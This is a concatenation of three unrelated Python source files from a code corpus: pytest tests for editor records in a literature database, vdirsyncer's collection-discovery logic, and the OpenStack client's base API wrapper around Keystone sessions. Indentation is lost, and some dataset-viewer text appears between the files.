from fastapi import HTTPException
metadata = MetaData()
engine = create_engine(SQLALCHEMY_DATABASE_URL, connect_args={"options": "-c timezone=utc"})
SessionLocal = sessionmaker(bind=engine, autoflush=True)
db = SessionLocal()
# Add tables/schema if not already there.
Base.metadata.create_all(engine)
# Exit if this is not a test database, Exit.
if "literature-test" not in SQLALCHEMY_DATABASE_URL:
exit(-1)
def test_get_bad_editor():
with pytest.raises(HTTPException):
show(db, 99999)
def test_create_editor():
xml = {
"order": 1,
"first_name": "string",
"last_name": "string",
"name": "003_TCU",
"orcid": "ORCID:2345-2345-2345-234X",
"reference_curie": "AGR:AGR-Reference-0000000001"
}
res = create(db, xml)
assert res
# check db for editor
editor = db.query(EditorModel).filter(EditorModel.name == "003_TCU").one()
assert editor.first_name == "string"
def test_create_editor_for_ref_later():
xml = {
"order": 2,
"first_name": "string2",
"last_name": "string3",
"name": "Name2",
"orcid": "ORCID:3333-4444-5555-666X",
"reference_curie": "AGR:AGR-Reference-0000000001"
}
res = create(db, xml)
assert res
# check db for editor
editor = db.query(EditorModel).filter(EditorModel.name == "Name2").one()
assert editor.first_name == "string2"
def test_patch_editor():
xml = {'first_name': "003_TUA",
'orcid': "ORCID:5432-5432-5432-432X",
'reference_curie': 'AGR:AGR-Reference-0000000003'}
editor = db.query(EditorModel).filter(EditorModel.name == "003_TCU").one()
ed_schem = EditorSchemaPost(**xml)
res = patch(db, editor.editor_id, ed_schem)
assert res
mod_editor = db.query(EditorModel).filter(EditorModel.first_name == "003_TUA").one()
assert editor.editor_id == mod_editor.editor_id
assert mod_editor.orcid == "ORCID:5432-5432-5432-432X"
def test_show_editor():
editor = db.query(EditorModel).filter(EditorModel.first_name == "003_TUA").one()
edi = show(db, editor.editor_id)
assert edi['orcid'] == "ORCID:5432-5432-5432-432X"
def test_changesets():
editor = db.query(EditorModel).filter(EditorModel.first_name == "003_TUA").one()
res = show_changesets(db, editor.editor_id)
# Orcid changed from None -> ORCID:2345-2345-2345-234X -> ORCID:5432-5432-5432-432X
for transaction in res:
if not transaction['changeset']['orcid'][0]:
assert transaction['changeset']['orcid'][1] == 'ORCID:2345-2345-2345-234X'
else:
assert transaction['changeset']['orcid'][0] == 'ORCID:2345-2345-2345-234X'
assert transaction['changeset']['orcid'][1] == 'ORCID:5432-5432-5432-432X'
def test_destroy_editor():
editor = db.query(EditorModel).filter(EditorModel.first_name == "003_TUA").one()
destroy(db, editor.editor_id)
# It should now give an error on lookup.
with pytest.raises(HTTPException):
show(db, editor.editor_id)
# Deleting it again should give an error as the lookup will fail.
with pytest.raises(HTTPException):
destroy(db, editor.editor_id)
|
the-stack_106_23915 | import asyncio
import hashlib
import json
import logging
import sys
import aiohttp
import aiostream
from . import cli_logger
from .. import exceptions
from .utils import handle_collection_not_found
from .utils import handle_collection_was_removed
from .utils import handle_storage_init_error
from .utils import load_status
from .utils import save_status
from .utils import storage_class_from_config
from .utils import storage_instance_from_config
# Increase whenever upgrade potentially breaks discovery cache and collections
# should be re-discovered
DISCOVERY_CACHE_VERSION = 1
logger = logging.getLogger(__name__)
def _get_collections_cache_key(pair):
m = hashlib.sha256()
j = json.dumps(
[
DISCOVERY_CACHE_VERSION,
pair.collections,
pair.config_a,
pair.config_b,
],
sort_keys=True,
)
m.update(j.encode("utf-8"))
return m.hexdigest()
async def collections_for_pair(
status_path,
pair,
from_cache=True,
list_collections=False,
*,
connector: aiohttp.TCPConnector,
):
"""Determine all configured collections for a given pair. Takes care of
shortcut expansion and result caching.
:param status_path: The path to the status directory.
:param from_cache: Whether to load from cache (aborting on cache miss) or
discover and save to cache.
:returns: iterable of (collection, (a_args, b_args))
"""
cache_key = _get_collections_cache_key(pair)
if from_cache:
rv = load_status(status_path, pair.name, data_type="collections")
if rv and rv.get("cache_key", None) == cache_key:
return list(_expand_collections_cache(
rv['collections'], pair.config_a, pair.config_b
))
if rv:
raise exceptions.UserError("Detected change in config file, "
"please run `vdirsyncer discover {}`."
.format(pair.name))
raise exceptions.UserError("Please run `vdirsyncer discover {}` "
" before synchronization."
.format(pair.name))
logger.info("Discovering collections for pair {}".format(pair.name))
a_discovered = _DiscoverResult(pair.config_a, connector=connector)
b_discovered = _DiscoverResult(pair.config_b, connector=connector)
if list_collections:
# TODO: We should gather data and THEN print, so it can be async.
await _print_collections(
pair.config_a["instance_name"],
a_discovered.get_self,
connector=connector,
)
await _print_collections(
pair.config_b["instance_name"],
b_discovered.get_self,
connector=connector,
)
# We have to use a list here because the special None/null value would get
# mangled to string (because JSON objects always have string keys).
rv = await aiostream.stream.list(
expand_collections(
shortcuts=pair.collections,
config_a=pair.config_a,
config_b=pair.config_b,
get_a_discovered=a_discovered.get_self,
get_b_discovered=b_discovered.get_self,
_handle_collection_not_found=handle_collection_not_found,
)
)
if "from b" in (pair.collections or []):
only_in_a = set((await a_discovered.get_self()).keys()) - set(
(await b_discovered.get_self()).keys())
if only_in_a and "delete" in pair.config_a["implicit"]:
for a in only_in_a:
try:
handle_collection_was_removed(pair.config_a, a)
save_status(status_path, pair.name, a, data_type="metadata")
save_status(status_path, pair.name, a, data_type="items")
except NotImplementedError as e:
cli_logger.error(e)
if "from a" in (pair.collections or []):
only_in_b = set((await b_discovered.get_self()).keys()) - set(
(await a_discovered.get_self()).keys())
if only_in_b and "delete" in pair.config_b["implicit"]:
for b in only_in_b:
try:
handle_collection_was_removed(pair.config_b, b)
save_status(status_path, pair.name, b, data_type="metadata")
save_status(status_path, pair.name, b, data_type="items")
except NotImplementedError as e:
cli_logger.error(e)
await _sanity_check_collections(rv, connector=connector)
save_status(
status_path,
pair.name,
data_type="collections",
data={
"collections": list(
_compress_collections_cache(rv, pair.config_a, pair.config_b)
),
"cache_key": cache_key,
},
)
return rv
async def _sanity_check_collections(collections, *, connector):
tasks = []
for _, (a_args, b_args) in collections:
tasks.append(storage_instance_from_config(a_args, connector=connector))
tasks.append(storage_instance_from_config(b_args, connector=connector))
await asyncio.gather(*tasks)
def _compress_collections_cache(collections, config_a, config_b):
def deduplicate(x, y):
rv = {}
for key, value in x.items():
if key not in y or y[key] != value:
rv[key] = value
return rv
for name, (a, b) in collections:
yield name, (deduplicate(a, config_a), deduplicate(b, config_b))
def _expand_collections_cache(collections, config_a, config_b):
for name, (a_delta, b_delta) in collections:
a = dict(config_a)
a.update(a_delta)
b = dict(config_b)
b.update(b_delta)
yield name, (a, b)
class _DiscoverResult:
def __init__(self, config, *, connector):
self._cls, _ = storage_class_from_config(config)
if self._cls.__name__ in [
"CardDAVStorage",
"CalDAVStorage",
"GoogleCalendarStorage",
]:
assert connector is not None
config["connector"] = connector
self._config = config
self._discovered = None
async def get_self(self):
if self._discovered is None:
self._discovered = await self._discover()
return self._discovered
async def _discover(self):
try:
discovered = await aiostream.stream.list(self._cls.discover(**self._config))
except NotImplementedError:
return {}
except Exception:
return handle_storage_init_error(self._cls, self._config)
else:
storage_type = self._config["type"]
rv = {}
for args in discovered:
args["type"] = storage_type
rv[args["collection"]] = args
return rv
async def expand_collections(
shortcuts,
config_a,
config_b,
get_a_discovered,
get_b_discovered,
_handle_collection_not_found,
):
handled_collections = set()
if shortcuts is None:
shortcuts = [None]
for shortcut in shortcuts:
if shortcut == "from a":
collections = await get_a_discovered()
elif shortcut == "from b":
collections = await get_b_discovered()
else:
collections = [shortcut]
for collection in collections:
if isinstance(collection, list):
collection, collection_a, collection_b = collection
else:
collection_a = collection_b = collection
if collection in handled_collections:
continue
handled_collections.add(collection)
a_args = await _collection_from_discovered(
get_a_discovered,
collection_a,
config_a,
_handle_collection_not_found,
)
b_args = await _collection_from_discovered(
get_b_discovered,
collection_b,
config_b,
_handle_collection_not_found,
)
yield collection, (a_args, b_args)
async def _collection_from_discovered(
get_discovered, collection, config, _handle_collection_not_found
):
if collection is None:
args = dict(config)
args["collection"] = None
return args
try:
return (await get_discovered())[collection]
except KeyError:
return await _handle_collection_not_found(config, collection)
async def _print_collections(
instance_name: str,
get_discovered,
*,
connector: aiohttp.TCPConnector,
):
try:
discovered = await get_discovered()
except exceptions.UserError:
raise
except Exception:
# Unless discovery failed due to a user-inflicted error (instanceof
# UserError), we don't even know if the storage supports discovery
# properly. So we can't abort.
import traceback
logger.debug("".join(traceback.format_tb(sys.exc_info()[2])))
logger.warning(
"Failed to discover collections for {}, use `-vdebug` "
"to see the full traceback.".format(instance_name)
)
return
logger.info(f"{instance_name}:")
tasks = []
for args in discovered.values():
tasks.append(_print_single_collection(args, instance_name, connector))
await asyncio.gather(*tasks)
async def _print_single_collection(args, instance_name, connector):
collection = args["collection"]
if collection is None:
return
args["instance_name"] = instance_name
try:
storage = await storage_instance_from_config(
args,
create=False,
connector=connector,
)
displayname = await storage.get_meta("displayname")
except Exception:
displayname = ""
logger.info(
" - {}{}".format(
json.dumps(collection),
f' ("{displayname}")' if displayname and displayname != collection else "",
)
)
|
the-stack_106_23916 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Base API Library"""
import simplejson as json
from keystoneauth1 import exceptions as ks_exceptions
from keystoneauth1 import session as ks_session
from osc_lib import exceptions
from openstackclient.i18n import _
class KeystoneSession(object):
"""Wrapper for the Keystone Session
Restore some requests.session.Session compatibility;
keystoneauth1.session.Session.request() has the method and url
arguments swapped from the rest of the requests-using world.
"""
def __init__(
self,
session=None,
endpoint=None,
**kwargs
):
"""Base object that contains some common API objects and methods
:param Session session:
The default session to be used for making the HTTP API calls.
:param string endpoint:
The URL from the Service Catalog to be used as the base for API
requests on this API.
"""
super(KeystoneSession, self).__init__()
# a requests.Session-style interface
self.session = session
self.endpoint = endpoint
def _request(self, method, url, session=None, **kwargs):
"""Perform call into session
All API calls are funneled through this method to provide a common
place to finalize the passed URL and other things.
:param string method:
The HTTP method name, i.e. ``GET``, ``PUT``, etc
:param string url:
The API-specific portion of the URL path
:param Session session:
HTTP client session
:param kwargs:
keyword arguments passed to requests.request().
:return: the requests.Response object
"""
if not session:
session = self.session
if not session:
session = ks_session.Session()
if self.endpoint:
if url:
url = '/'.join([self.endpoint.rstrip('/'), url.lstrip('/')])
else:
url = self.endpoint.rstrip('/')
# Why is ksc session backwards???
return session.request(url, method, **kwargs)
class BaseAPI(KeystoneSession):
"""Base API"""
def __init__(
self,
session=None,
service_type=None,
endpoint=None,
**kwargs
):
"""Base object that contains some common API objects and methods
:param Session session:
The default session to be used for making the HTTP API calls.
:param string service_type:
API name, i.e. ``identity`` or ``compute``
:param string endpoint:
The URL from the Service Catalog to be used as the base for API
requests on this API.
"""
super(BaseAPI, self).__init__(session=session, endpoint=endpoint)
self.service_type = service_type
# The basic action methods all take a Session and return dict/lists
def create(
self,
url,
session=None,
method=None,
**params
):
"""Create a new resource
:param string url:
The API-specific portion of the URL path
:param Session session:
HTTP client session
:param string method:
HTTP method (default POST)
"""
if not method:
method = 'POST'
ret = self._request(method, url, session=session, **params)
# Should this move into _requests()?
try:
return ret.json()
except json.JSONDecodeError:
return ret
def delete(
self,
url,
session=None,
**params
):
"""Delete a resource
:param string url:
The API-specific portion of the URL path
:param Session session:
HTTP client session
"""
return self._request('DELETE', url, **params)
def list(
self,
path,
session=None,
body=None,
detailed=False,
**params
):
"""Return a list of resources
GET ${ENDPOINT}/${PATH}?${PARAMS}
path is often the object's plural resource type
:param string path:
The API-specific portion of the URL path
:param Session session:
HTTP client session
:param body: data that will be encoded as JSON and passed in POST
request (GET will be sent by default)
:param bool detailed:
Adds '/details' to path for some APIs to return extended attributes
:returns:
JSON-decoded response, could be a list or a dict-wrapped-list
"""
if detailed:
path = '/'.join([path.rstrip('/'), 'details'])
if body:
ret = self._request(
'POST',
path,
# service=self.service_type,
json=body,
params=params,
)
else:
ret = self._request(
'GET',
path,
# service=self.service_type,
params=params,
)
try:
return ret.json()
except json.JSONDecodeError:
return ret
# Layered actions built on top of the basic action methods do not
# explicitly take a Session but one may still be passed in kwargs
def find_attr(
self,
path,
value=None,
attr=None,
resource=None,
):
"""Find a resource via attribute or ID
Most APIs return a list wrapped by a dict with the resource
name as key. Some APIs (Identity) return a dict when a query
string is present and there is one return value. Take steps to
unwrap these bodies and return a single dict without any resource
wrappers.
:param string path:
The API-specific portion of the URL path
:param string value:
value to search for
:param string attr:
attribute to use for resource search
:param string resource:
plural of the object resource name; defaults to path
For example:
n = find(netclient, 'network', 'networks', 'matrix')
"""
# Default attr is 'name'
if attr is None:
attr = 'name'
# Default resource is path - in many APIs they are the same
if resource is None:
resource = path
def getlist(kw):
"""Do list call, unwrap resource dict if present"""
ret = self.list(path, **kw)
if isinstance(ret, dict) and resource in ret:
ret = ret[resource]
return ret
# Search by attribute
kwargs = {attr: value}
data = getlist(kwargs)
if isinstance(data, dict):
return data
if len(data) == 1:
return data[0]
if len(data) > 1:
msg = _("Multiple %(resource)s exist with %(attr)s='%(value)s'")
raise exceptions.CommandError(
msg % {'resource': resource,
'attr': attr,
'value': value}
)
# Search by id
kwargs = {'id': value}
data = getlist(kwargs)
if len(data) == 1:
return data[0]
msg = _("No %(resource)s with a %(attr)s or ID of '%(value)s' found")
raise exceptions.CommandError(
msg % {'resource': resource,
'attr': attr,
'value': value}
)
def find_bulk(
self,
path,
**kwargs
):
"""Bulk load and filter locally
:param string path:
The API-specific portion of the URL path
:param kwargs:
A dict of AVPs to match - logical AND
:returns: list of resource dicts
"""
items = self.list(path)
if isinstance(items, dict):
# strip off the enclosing dict
key = list(items.keys())[0]
items = items[key]
ret = []
for o in items:
try:
if all(o[attr] == kwargs[attr] for attr in kwargs.keys()):
ret.append(o)
except KeyError:
continue
return ret
def find_one(
self,
path,
**kwargs
):
"""Find a resource by name or ID
:param string path:
The API-specific portion of the URL path
:returns:
resource dict
"""
bulk_list = self.find_bulk(path, **kwargs)
num_bulk = len(bulk_list)
if num_bulk == 0:
msg = _("none found")
raise exceptions.NotFound(msg)
elif num_bulk > 1:
msg = _("many found")
raise RuntimeError(msg)
return bulk_list[0]
def find(
self,
path,
value=None,
attr=None,
):
"""Find a single resource by name or ID
:param string path:
The API-specific portion of the URL path
:param string value:
search expression
:param string attr:
name of attribute for secondary search
"""
try:
ret = self._request('GET', "/%s/%s" % (path, value)).json()
except ks_exceptions.NotFound:
kwargs = {attr: value}
try:
ret = self.find_one("/%s/detail" % (path), **kwargs)
except ks_exceptions.NotFound:
msg = _("%s not found") % value
raise exceptions.NotFound(msg)
return ret
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.